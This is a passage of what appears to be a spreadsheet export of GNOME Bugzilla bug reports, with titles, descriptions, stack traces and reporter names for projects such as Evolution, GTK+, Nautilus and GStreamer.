#2  0x4080b263 in waitpid () from /lib/libpthread.so.0
#3  0x400b58a3 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x40808d94 in pthread_sighandler () from /lib/libpthread.so.0
#5  0x408e6928 in sigaction () from /lib/libc.so.6
#6  0x407cbb6a in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
#7  0x407cbaf6 in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
#8  0x407c5ad6 in ORBit_small_freekids () from /usr/lib/libORBit-2.so.0
#9  0x407c6055 in ORBit_small_invoke_stub () from
/usr/lib/libORBit-2.so.0
#10 0x402fc9b6 in ConfigDatabase_set () from /usr/lib/libgconf-2.so.4
#11 0x402f4b51 in gconf_engine_set () from /usr/lib/libgconf-2.so.4
#12 0x402f6b22 in gconf_engine_get_pair () from
/usr/lib/libgconf-2.so.4
#13 0x402f8fd9 in gconf_client_set_string () from
/usr/lib/libgconf-2.so.4
#14 0x08077073 in drawer_save_to_gconf ()
#15 0x08074f80 in panel_applet_save_to_gconf ()
#16 0x0807534d in panel_applet_register ()
#17 0x08076d72 in load_drawer_applet ()
#18 0x08077200 in drawer_load_from_gconf ()
#19 0x08074c23 in panel_applet_create_menu ()
#20 0x08074cf5 in panel_applet_create_menu ()
#21 0x08074d36 in panel_applet_load_applets_from_gconf ()
#22 0x08067a92 in session_load ()
#23 0x0805aa49 in main ()
#24 0x408d66cf in __libc_start_main () from /lib/libc.so.6
#0  0x4095db79 in wait4 () from /lib/libc.so.6
#0  0x4095db79 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x409d6068 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x4080b263 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400b58a3 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x40808d94 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x408e6928 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x407cbb6a in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#7  0x407cbaf6 in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-05 13:17 -------
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GIMP-141382</t>
  </si>
  <si>
    <t>Copy to clipboard is not possible for a grayscale image under Wind XP</t>
  </si>
  <si>
    <t>Copy to clipboard is not possible for a grayscale image under Wind XP. Ive tried
it with serveral Maschines same result. When I convert the grayscale Image to
RGB its possible to copy the image to clipboard.</t>
  </si>
  <si>
    <t>derter3</t>
  </si>
  <si>
    <t>GTK+-156378</t>
  </si>
  <si>
    <t>Add icon theme support to GtkAboutDialog</t>
  </si>
  <si>
    <t>The following patch adds support for using a themed icon as the logo in the
about dialog using the new gtk_image_set_from_icon_name() API (which means that
the about dialog should retheme on icon theme change).
It adds a new property logo_icon_name that sets the logo to a named icon.</t>
  </si>
  <si>
    <t>GEDIT-407689</t>
  </si>
  <si>
    <t>Sidebar notebook tablabels aren't translated</t>
  </si>
  <si>
    <t>Documents and Tags on panel are not translated but they present in po files</t>
  </si>
  <si>
    <t>GNOME-APPLETS-73387</t>
  </si>
  <si>
    <t>gkb crashes when add certain keyboards</t>
  </si>
  <si>
    <t>1) Start gkb-applet-2.
Applet broken doesn't change user's keyboard mappings for selected
country.
Error:
gkb-applet-2 broken gkb_xmmap: xmodmap: not found</t>
  </si>
  <si>
    <t>EVOLUTION-213151</t>
  </si>
  <si>
    <t>move/copy toolbar buttons crash mailer</t>
  </si>
  <si>
    <t>The routines in mail-callbacks believe they're being called with
a GtkWidget as the first arg but it's really a BonoboUISomething
and the call to gtk_widget_get_toplevel in transfer_msg returns
NULL and evolution_shell_client_user_select_folder crashes. Which
may be a shell bug but still we ought to be passing the right
value anyway.</t>
  </si>
  <si>
    <t>EVOLUTION-402925</t>
  </si>
  <si>
    <t>Evolution uses weak encryption for SSL/TLS</t>
  </si>
  <si>
    <t>Please describe the problem:
Evolution uses weak encryption when sending mail via SSL/TLS.
 E.g. the server supports AES 256 bit but Evolution uses the probably weakest encryption available (no matter if TLS on port 25 or SSL on port 465):
(using TLSv1 with cipher RC4-MD5 (128/128 bits))
I consider this a serious bug as RC4-MD5 is definitly not a good idea.
Manually connecting via 'openssl s_client' to the server I used for testing shows:
 SSL-Session:
     Protocol : TLSv1
     Cipher : DHE-RSA-AES256-SHA
So it definitly works on the server-side.
Steps to reproduce:
1. Send mail via a TLS/SSL-enabled mailserver
2. Check the used encryption
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>hggdh2</t>
  </si>
  <si>
    <t>LIBXSLT-324857</t>
  </si>
  <si>
    <t>MinGW build fixes</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Try to compile libxslt (fails because attrvt.o isn't specified in
Makefile.mingw and it references libxml2 using -llibxml2 which should be
-lxml2.dll or -lxml2)
2. xsltproc enters endless recursion and produces stack overflow as soon as the
application tries to use *snprintf
Stack trace:
None available because it takes a loooong time to produce the crash due to stack
overflow
Other information:
I'll apply a patch that fixes the problem.</t>
  </si>
  <si>
    <t>mark.junker75</t>
  </si>
  <si>
    <t>F-SPOT-167882</t>
  </si>
  <si>
    <t>Improved libexif API change handling for F-spot</t>
  </si>
  <si>
    <t>I noticed the FIXME's present in the Exif files.
Here's a patch which is equivalent to what was just introduced into beagle
assuming you want to go down the same route here.</t>
  </si>
  <si>
    <t>VTE-82836</t>
  </si>
  <si>
    <t>autogen.sh doesn't work.</t>
  </si>
  <si>
    <t>If you have autoconf-2.53 installed (and possibly a newer automake as well)
it fails in various ways. I had to install version 1.8 of autogen.sh for it
to build.</t>
  </si>
  <si>
    <t>GSTREAMER-451145</t>
  </si>
  <si>
    <t>[vorbisdec] errors out on 0-sized packets</t>
  </si>
  <si>
    <t>Please describe the problem:
I discovered that this weeks episode of the Atheist Experience podcast does not play in Banshee nor in Totem but it will play using ogg123. It complains that it cannot decode the mediastream.
Direct download:
http://www.atheist-experience.com/archive/AtheistExp-2007-06-24.ogg
Steps to reproduce:
1. Download file
2. open in totem
Actual results:
could not decode mediastream error
Expected results:
correct playback
Does this happen every time?
100%
Other information:
Running Fedora Development 20070625 on x86_64
gstreamer-0.10.13-2.fc8
gstreamer-plugins-good-0.10.6-1.fc8</t>
  </si>
  <si>
    <t>GEDIT-395055</t>
  </si>
  <si>
    <t>void function returns value - breaks on Solaris</t>
  </si>
  <si>
    <t>gedit 2.17.3
gedit-io-error-message-area.c line 132: void function cannot return value
Solution is to remove the variable from the return statement:
-       return message_area
+       return
Attached patch does this.</t>
  </si>
  <si>
    <t>NAUTILUS-40908</t>
  </si>
  <si>
    <t>distro check only supports redhat</t>
  </si>
  <si>
    <t xml:space="preserve">In the current version of helixcode-utils.c all of the determine_FOO_version
functions open a file descriptor but do not close it once they return a version.
This needs to be cleaned up as well as the current functions.  They were taken
from helix-install and I haven't had time to clean them up.  There are better
ways to do this I just don't want to waste too much time on it right now.
------- Additional Comments From eskil@eskil.dk 2000-06-09 22:34:30 ----
Actually the whole helixcodeutils stinks. Ill rewrite it into a
pretty distro finder.
------- Additional Comments From eskil@eskil.dk 2000-06-09 23:43:02 ----
Revamped and works for Redhat now.
Need to implement the rest of the determine_FOO_version
But as long as we're only aiming at Red Hat compability...
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:27:52 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:04:08 ----
Batch-assigning QA ownership of Services bugs to Albert.
------- Additional Comments From mjs@noisehavoc.org 2001-01-09 13:54:25 ----
For 1.0 we should at least detect other distributions so we can tell the user
what their distribution is when we tell them it's not supported.
Also Mandrake should be handled for shortly post-1.0 better to get it right
sooner rather than later.
Giving to Ian for 1.0 so he has something to do.
------- Additional Comments From yakk@yakk.net 2001-02-03 16:50:34 ----
Added version checking for Debian. All thats  missing now is a SuSE version
check. I'll have a poke at the test boxes at work.
------- Additional Comments From yakk@yakk.net 2001-02-04 22:34:20 ----
Added SuSE version check.
I'm closing this bug. I guess someone should re-open it if we decide we want to
support some new distros...
------- Additional Comments From victor@eazel.com 2001-03-05 20:03:08 ----
moving verification to 1.2
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:34 -------
The original reporter (pepper@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>NAUTILUS-41751</t>
  </si>
  <si>
    <t>Show link emblem for search results only if the search result is a symbolic link</t>
  </si>
  <si>
    <t xml:space="preserve">Although the search results are virtual links we should not attach the link
emblem to all of the search results.  Only the search results where the actual
file is a link should have these emblems.
in the search meeting we decided this feature was required for 1.0
------- Additional Comments From rebecka@eazel.com 2000-07-25 17:18:59 ----
Hmm..it isn't clear how to make this work given that gnome vfs doesn't
even keep track of the link/non-link property of search results right now
and neither does medusa
------- Additional Comments From darin@bentspoon.com 2000-08-15 16:37:30 ----
John's change to the search view fixes this problem so the task si done.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:28:19 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 18:59:48 ----
Batch-assigning QA ownership of Search Interface bugs to Josh Barrow.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>mathieu</t>
  </si>
  <si>
    <t>GTK+-155524</t>
  </si>
  <si>
    <t>Input Methods</t>
  </si>
  <si>
    <t>Can't use Compose and Meta to type composed chars</t>
  </si>
  <si>
    <t>1. Set your input method to Cedilla or Default
2. Type Compose key then a then AltGr-` on a french configured keyboard
3. you get a` instead of Ã  or a beep when you press AltGr
AltGr is right alt in france and gives access to a range of chars often used in
France.  ` is done with AltGr-7 to produce a grave accent.
Workaround : use the X input method.
Is there a doc on input methods?  extension configuration selection ...?
This is Debian bug .
Regards
-- 
Loic Minier</t>
  </si>
  <si>
    <t>GNOME-MEDIA-306755</t>
  </si>
  <si>
    <t>Gnome-Sound-Recorder</t>
  </si>
  <si>
    <t>gnome-sound-recorder does not ask to save the files</t>
  </si>
  <si>
    <t>Steps to reproduce:
--------------------
1. Launch gnome-sound-recorder
2. Record some audio
3. Close the window.
Bug: gnome-sound-recorder does not ask to save the files.</t>
  </si>
  <si>
    <t>archana.shah</t>
  </si>
  <si>
    <t>GTK+-154658</t>
  </si>
  <si>
    <t>rounding problem in gtkpaned</t>
  </si>
  <si>
    <t>Please describe the problem:
In resize mode gtkpaned.c rounds down when positioning the pane on a resize. As
a result repeated resizing causes the bar to drift towards the zero position. 
Steps to reproduce:
1. start gtk-demo open the paned demo widget
2. turn on top vertical resize drag the horizontal bar near the top of the window
3. resize vertically a few times ... the bar will crawl up the screen
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>john.cupitt</t>
  </si>
  <si>
    <t>BEAGLE-326883</t>
  </si>
  <si>
    <t>holmes fails to start - Failed to open file 'system-search.png'</t>
  </si>
  <si>
    <t>Steps to reproduce:
Have built latest holmes from CVS and installed.  Running 'search' from the
command line results in the following:
Stack trace:
ogley@riggwelter:~&gt; search
Unhandled Exception: GLib.GException: Failed to open file 'system-search.png':
No such file or directory
in  Gdk.Pixbuf:.ctor (System.String filename)
in  Search.Tray.TrayIcon:.ctor ()
in  Search.MainWindow:.ctor ()
in  Search.MainWindow:Main (System.String[] args)
Other information:
src/Search.cs line 115: Icon = Gdk.Pixbuf.LoadFromResource (system-search.png)
This seems to be where it's loaded - should it be: Icon = Images.GetPixbuf
(system-search.png) ?
On a related note none of the pixmaps in src are installed - I have a patch to
install them if it's wanted...</t>
  </si>
  <si>
    <t>riggwelter</t>
  </si>
  <si>
    <t>EVOLUTION-354074</t>
  </si>
  <si>
    <t>Meeting/Appoint Recurrence Until Date Not Respected</t>
  </si>
  <si>
    <t>Please describe the problem:
Editing a recurring appointment/meeting that recurrs until a specific date
changes the until-date on its own.
Steps to reproduce:
1. Create a recurring appointment in a local calendar
2. Make it reccur every 1 week(s) on Thursdays until December 7 2006 for example
3. Save and close the event.
4. Double-click and re-open the event from the calendar
5. Go to the recurring tab. The until-date is now changed. &lt;-- INCORRECT BEHAVIOR
Actual results:
The until-date for recurrence changes arbitrarily. Clicking on different instances of the same recurring event further shows different end dates.
Expected results:
The end date of the recurring event should be that entered by the user. It should not change on its own. 
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>guhasaikat</t>
  </si>
  <si>
    <t>PAN-346809</t>
  </si>
  <si>
    <t>Tasks window status info is overwritten by window resize widget</t>
  </si>
  <si>
    <t>The OS X implementation of X11 must be placing a resize widget in the bottom right corner of each window.  This partially obscures the Tasks window's new status info so that the seconds are covered up.  Perhaps shifting the field slightly to the left would be an easy fix and perhaps programmatically detecting where the widget begins and fitting the field next to it would be a more difficult fix.</t>
  </si>
  <si>
    <t>spamact</t>
  </si>
  <si>
    <t>EVOLUTION-228274</t>
  </si>
  <si>
    <t>Editing event on reminder closes reminder dialog yet reminder repeats on next launch</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.8
Synopsis: Editing event on reminder closes reminder dialog yet reminder repeats on next launch
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
If I receive a reminder in Evolution about an event and then click edit
event the reminder dialog dismisses itself. When I close the event
editor and then restart Evolution I receive a reminder for the same
event again.
Unknown reporter: joshgNO@SPAMmyrealbox.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>SEAHORSE-138783</t>
  </si>
  <si>
    <t>Please avoid trailing spaces in seahorse messages</t>
  </si>
  <si>
    <t>#: src/seahorse-generate-druid.glade.h:6
msgid Confirm Passphrase: 
#: src/seahorse-generate-druid.glade.h:9
msgid Email Address: 
#: src/seahorse-generate-druid.glade.h:12
msgid Expiration Date: 
#: src/seahorse-generate-druid.glade.h:14
msgid Full Name: 
Please avoid trailing spaces in messages. It seems unnecessary is inconsistant
with other messages in seahorse and GNOME and causes lots of unnecessary
trouble for translators who have to update their translations to match the
trailing spaces. See
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#language for
more details about this problem.</t>
  </si>
  <si>
    <t>GTK+-54431</t>
  </si>
  <si>
    <t>not accurate docs for gtk_vruler_new() and gtk_hruler_new()</t>
  </si>
  <si>
    <t>Usually fields Returns: in documentation for functions which create
          widgets say smth like this:
                  Returns: a new 
          and widget name is a hyperlink to the documentation for the
widget (see
          docs for GtkImage or GtkLabel for example).
Documentation for gtk_hruler_new () says:
Returns : the new GTKHRuler
and 'GTKHRuler' is not a link to GtkHRuler documentation.
Same for gtk_vruler_new ().</t>
  </si>
  <si>
    <t>PANGO-145275</t>
  </si>
  <si>
    <t>Font selection for space characters</t>
  </si>
  <si>
    <t>To reproduce:
1. Log into gnome on Japanese locales.
2. Invoke gedit.
3. Input 'Ctrl + Space' and change to Kanji-mode.
4. Input 'Space' key.
Then the char is corrupt</t>
  </si>
  <si>
    <t>JAVA-GNOME-332494</t>
  </si>
  <si>
    <t>Bindings Core</t>
  </si>
  <si>
    <t>Generating and including jni header files</t>
  </si>
  <si>
    <t>generate jni header files from .class files and #include them in
jni .c.</t>
  </si>
  <si>
    <t>swagiaal</t>
  </si>
  <si>
    <t>GNOMEICU-159425</t>
  </si>
  <si>
    <t>Problems with entities in nicknames</t>
  </si>
  <si>
    <t>1) Use mirabilis' icq to add some contacts with nicknames in russian (my case)
or starting with '&amp;' (ampersand).
2) Install GnomeICU from scratch it will import the contact list from the server.
3) Nicknames staring with ampersand appear empty in the main list russian names
apper OK but wrong (bad codepage) in User info window.
Easy fix: just rename the contact to the same name after that it will apper
correctly everywhere.</t>
  </si>
  <si>
    <t>dronmbi</t>
  </si>
  <si>
    <t>EVOLUTION-212721</t>
  </si>
  <si>
    <t>evolution main window covers info window on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.16.99
Synopsis: evolution main window covers info window on startup
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Description:
Whenever I start evolution it goes through displaying the splash
screen
then opens the thanks dialog.   Proplem is that the main window
opens on top of the thanks dialog so I have to bring the thanks
dialog up to close it.   Annoying but very minor.
Unknown reporter: msw00003@penguin.tamucc.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>msw00003</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-81026</t>
  </si>
  <si>
    <t>gnome-file-type-properties doesn't understand --disable-crash-dialog</t>
  </si>
  <si>
    <t>using control-center 1.99.10 :
try to launch : gnome-file-type-properties --disable-crash-dialog
instead of being started in standard mode capplet starts in add new
mimetype mode with --disable-crash-dialog as a new mime type.</t>
  </si>
  <si>
    <t>METACITY-417810</t>
  </si>
  <si>
    <t>Implicit pointer conversion likely to cause crashes on 64-bits arches</t>
  </si>
  <si>
    <t>Hi
I hope this is the correct place to report libcm bugs.
Dann Frazier reported in Debian bug http://bugs.debian.org/414635 that a discrepancy between a header and a C file cause an implicit pointer conversion which is likely to caues crashes on 64-bits arches.
I'll attach a patch.
Bye</t>
  </si>
  <si>
    <t>GLADE-406504</t>
  </si>
  <si>
    <t>fix build with gcc 2</t>
  </si>
  <si>
    <t>The following patches make glade 3.1.4 compile successfully with gcc 2.95.</t>
  </si>
  <si>
    <t>BANSHEE-379119</t>
  </si>
  <si>
    <t>njb-sharp assembly not found when started with make run</t>
  </si>
  <si>
    <t>I can't start banshee uninstalled. 
I have NJB enabled and njb-sharp installed
Here's the output I have when I try to start banshee with make run :
$ make run
pushd ./src \
        make run \
        popd
~/Projets/banshee/src ~/Projets/banshee
make[1]: Entering directory `/home/lorentz/Projets/banshee/src'
LD_LIBRARY_PATH=../libbanshee/.libs DYLD_LIBRARY_PATH=${LD_LIBRARY_PATH} MONO_PATH=../hal-sharp:../taglib-sharp:../dbus-sharp:../src/Last.FM:../src/MusicBrainz:../src/Gnome.Keyring:../src/Banshee.Widgets:../src/Banshee.Base:../src/Boo:../src/BooBuddy:../src/Banshee.Dap/Ipod:$(dirname `pkg-config --variable=Libraries ipod-sharp`):../src/Banshee.Dap/Njb:../src/Banshee.Dap/Mtp:../src/Banshee.Dap/MassStorage BANSHEE_ENGINES_PATH=../src/Banshee.MediaEngine BANSHEE_PLUGINS_PATH=../src/Banshee.Plugins${BANSHEE_PLUGINS_PATH+:$BANSHEE_PLUGINS_PATH} BANSHEE_DAP_PATH=../src/Banshee.Dap${BANSHEE_DAP_PATH+:$BANSHEE_DAP_PATH} BANSHEE_PROFILES_PATH=../data/audio-profiles bash ./banshee --uninstalled
** Running uninstalled Banshee **
Warning: [11/25/2006 2:26:46 PM] (Cannot connect to NetworkManager) - An available working network connection will be assumed
Performing compatibility update on playlist 'Queue'
Debug: [11/25/2006 2:26:47 PM] (Loading audio profiles) - ../data/audio-profiles
Debug: [11/25/2006 2:26:48 PM] (Default player engine) - GStreamer 0.10
Debug: [11/25/2006 2:26:48 PM] (Audio CD Core Initialized) - 
** (./banshee.exe:25637): WARNING **: The following assembly referenced from /home/lorentz/Projets/banshee/src/Banshee.Dap/Njb/Banshee.Dap.Njb.dll could not be loaded:
     Assembly:   njb-sharp    (assemblyref_index=2)
     Version:    0.3.0.31188
     Public Key: (none)
The assembly was not found in the Global Assembly Cache a path listed in the MONO_PATH environment variable or in the location of the executing assembly (/home/lorentz/Projets/banshee/src/Banshee.Dap/Njb).
** (./banshee.exe:25637): WARNING **: Could not load file or assembly 'njb-sharp Version=0.3.0.31188 Culture=neutral' or one of its dependencies.
make[1]: *** [run] Segmentation fault
make[1]: Leaving directory `/home/lorentz/Projets/banshee/src'
~/Projets/banshee</t>
  </si>
  <si>
    <t>NETWORKMANAGER-491795</t>
  </si>
  <si>
    <t>Also ask for DNS info for static routes</t>
  </si>
  <si>
    <t>When setting up a static connection (no DHCP) it would be nice if the user had the option to specify the contents of /etc/resolv.conf for that connection. This will help folks who use networks with no DHCP such as SOHO installations. Like mine.
The current code leaves the /etc/resolv.conf from the previous network in place which may or may not work. To folk not familiar with DNS it will appear to be an intermittent failure.
At a minimum it would be nice to be able to set up to three servers' IP addresses and a search line (e.g. search foo.bar.baz.com bar.baz.com snark.org).
Cutting and pasting the contents of an existing /etc/resolv.conf is fine for us hackers but probably more freeform than most users want. I would suggest a simple dialog box with detailed tool tips.
NM keeps getting better thanks for all the hard work.</t>
  </si>
  <si>
    <t>charlescurley</t>
  </si>
  <si>
    <t>GNOME-PRINT-80414</t>
  </si>
  <si>
    <t>fonts</t>
  </si>
  <si>
    <t>Core dump application crash when downloading PFA font into Postscript output</t>
  </si>
  <si>
    <t>Applications like Gnumeric crash when the file referencing the font is
being produced (i.e. print has been chosen).</t>
  </si>
  <si>
    <t>williamp</t>
  </si>
  <si>
    <t>ATK-334438</t>
  </si>
  <si>
    <t>suspicious free in gailcombobox.c</t>
  </si>
  <si>
    <t>gailcombobox.c:244:
  combo_box = GTK_COMBO_BOX (widget)
  gail_combo_box = GAIL_COMBO_BOX (obj)
  g_free (gail_combo_box-&gt;name)
  if (gtk_combo_box_get_active_iter (combo_box &amp;iter))
The free is bogus since we then return gail_combo_box-&gt;name unconditionally even if we don't execute the codepath which assigns a new value.
Instead we should explicitly g_strdup() the string value and g_free() the name in the same block and use g_value_unset() to clean up the GValue struct used to obtain the name string.</t>
  </si>
  <si>
    <t>EVOLUTION-225960</t>
  </si>
  <si>
    <t>forward redirect should not show signature in editor</t>
  </si>
  <si>
    <t>Description of Problem:
 Autogenerated signature is attached to end of the message when
forward/redirecting a message.
 It's not nice to attach your signature to someone else's text.
 And yes it is possible to remove the signature from signature list next to
From address but it's not nice to do it always when bouncing mail.
Steps to reproduce the problem:
1. Select a mail message
2. Actions &gt; Forward &gt; Redirect
Actual Results:
 Autogenerated signature is attached to end of the message.
Expected Results:
 No signature should be attached automatically.
How often does this happen? 
 Always
Additional Information:
 evolution-1.1.0.99-snap.ximian.200206061001</t>
  </si>
  <si>
    <t>twillber</t>
  </si>
  <si>
    <t>EVOLUTION-405685</t>
  </si>
  <si>
    <t>OK button disabled in account properties window</t>
  </si>
  <si>
    <t>In the properties windows for e-mail accounts the OK button is constantly disabled. This makes it impossible to chance any settings for the entered e-mail accounts. The OK button shows up enable for half a second then disables and stays that way no matter what changes are made.</t>
  </si>
  <si>
    <t>ipse</t>
  </si>
  <si>
    <t>EVOLUTION-215174</t>
  </si>
  <si>
    <t>the mail component crashes intermittently</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.0
Synopsis: the mail component crashes intermittently
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
the mail component crashes intermittently whithout any particular
action
Unknown reporter: apassariello@byworks.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>apassariello</t>
  </si>
  <si>
    <t>EVOLUTION-206875</t>
  </si>
  <si>
    <t>UNMATCHED should display mail only from Inbox folder</t>
  </si>
  <si>
    <t>Now UNMATCHED displays mail from other folders besides Inbox (Sent other
folders I created and store mail there) should be Inbox only
I've asked about this on mailing list #evolution but got no answers of the
correct behaviour</t>
  </si>
  <si>
    <t>bugz.20.jardel</t>
  </si>
  <si>
    <t>GTKHTML-239624</t>
  </si>
  <si>
    <t>Evolution crashes while asking for IMAP password</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Evolution crashes on startup while asking for IMAP password
Steps to reproduce the problem:
1. run evolution-1.3
2. IMAP password dialog pops up
3. crash
Actual Results:
evo crashes
Expected Results:
evo should start up and show e-mail
How often does this happen? 
always
Additional Information:
output from --debug=:
eceived: * OK luna.statsbiblioteket.dk IMAP4 service (iPlanet Messaging
Server 5.2 HotFix 1.07 (built Nov 25 2002))
sending : A00000 CAPABILITY
received: * CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ NAMESPACE UIDPLUS
CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN
received: A00000 OK Completed
warning: failed to load external entity
/home/mv/evolution/config/storage-set-view-expanded:default
(evolution-1.3:12036): evolution-shell-CRITICAL **: file e-storage-set.c:
line 656 (e_storage_set_get_folder): assertion `g_path_is_absolute (path)'
failed
(evolution-1.3:12036): evolution-shell-CRITICAL **: file e-storage-set.c:
line 656 (e_storage_set_get_folder): assertion `g_path_is_absolute (path)'
failed
/home/mv/.gnome2/bug-buddy.d/bugzilla/gnome/products:1248: error: Input is
not proper UTF-8 indicate encoding !
26 description=Here you can place your bugs about Latvian [lv] translations /
                                                                              ^
/home/mv/.gnome2/bug-buddy.d/bugzilla/gnome/products:1248: error: Bytes:
0x8A 0x65 0x69 0x74
26 description=Here you can place your bugs about Latvian [lv] translations /
                                                                              ^
back-trace from bug-buddy:
Backtrace was generated from '/usr/bin/evolution-1.3'
[New Thread 8192 (LWP 12036)]
[New Thread 16385 (LWP 12043)]
[New Thread 8194 (LWP 12044)]
[New Thread 16387 (LWP 12045)]
[New Thread 24580 (LWP 12046)]
[New Thread 32773 (LWP 12047)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40526c63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x40306ff5 in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
#4  0x0808a59e in segv_redirect (sig=12049) at main.c:434
#5  0x414e6676 in segv_redirect (sig=0) at component-factory.c:1631
#6  0x4052847e in __pthread_sighandler () from /lib/i686/libpthread.so.0
#7  
#8  0x40e5b858 in g_list_reverse () from /usr/lib/libglib-2.0.so.0
#9  0x402986f2 in get_glyphs (slave=0x8407890 painter=0x83125f8 
    line_offset=3) at htmltextslave.c:677
#10 0x08407890 in ?? ()
#11 0x40298cec in draw (o=0x83125f8 p=0x83125f8 x=-10 y=-10 width=1205 
    height=817 tx=10 ty=10) at htmltextslave.c:853
#12 0x40283fe0 in html_object_draw (o=0x2000 p=0x83125f8 x=-10 y=-10 
    width=1205 height=817 tx=10 ty=10) at htmlobject.c:851
#13 0x40255b3c in draw (o=0x8216d30 p=0x83125f8 x=-10 y=-10 width=1205 
    height=817 tx=10 ty=10) at htmlclue.c:269
#14 0x40258bb0 in draw (self=0x8216d30 painter=0x83125f8 x=-10 y=-10 
    width=1205 height=817 tx=10 ty=10) at htmlclueflow.c:1274
#15 0x40283fe0 in html_object_draw (o=0x2000 p=0x83125f8 x=-10 y=-10 
    width=1205 height=817 tx=10 ty=10) at htmlobject.c:851
#16 0x40255b3c in draw (o=0x8215c00 p=0x83125f8 x=0 y=0 width=1205 
    height=817 tx=10 ty=10) at htmlclue.c:269
#17 0x4025c88e in draw (o=0x8215c00 p=0x83125f8 x=0 y=0 width=1205 
    height=817 tx=0 ty=0) at htmlcluev.c:350
#18 0x40283fe0 in html_object_draw (o=0x2000 p=0x83125f8 x=0 y=0 
    width=1205 height=817 tx=0 ty=0) at htmlobject.c:851
#19 0x4027764a in html_engine_draw_real (e=0x82f4838 x=0 y=0 width=1205 
    height=817 expose=8192) at htmlengine.c:4244
#20 0x4027792b in html_engine_expose (e=0x82f4838 event=0xbffff2f0)
    at htmlengine.c:4261
#21 0x4024b403 in expose (widget=0x8311c18 event=0xbffff2f0) at gtkhtml.c:913
#22 0x40b730e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0x40e03467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#24 0x40e030c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#25 0x40e17369 in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
#26 0x40e16689 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#27 0x40bb5fdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#28 0x40c59413 in gtk_widget_event_internal ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0x40b71b1c in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#30 0x40d1569f in gdk_window_process_updates_internal ()
   from /usr/lib/libgdk-x11-2.0.so.0
#31 0x40d1573a in gdk_window_process_all_updates ()
   from /usr/lib/libgdk-x11-2.0.so.0
#32 0x40b158ea in gtk_container_idle_sizer () from /usr/lib/libgtk-x11-2.0.so.0
#33 0x40e60c83 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
#34 0x40e5df65 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
#35 0x40e5ef98 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#36 0x40e5f2ad in g_main_context_iterate () from /usr/lib/libglib-2.0.so.0
#37 0x40e5fa1f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#38 0x4040f248 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#39 0x0808a868 in main (argc=2 argv=0xbffff634) at main.c:560
#40 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 6 (Thread 32773 (LWP 12047)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x40524108 in __pthread_wait_for_restart_signal ()
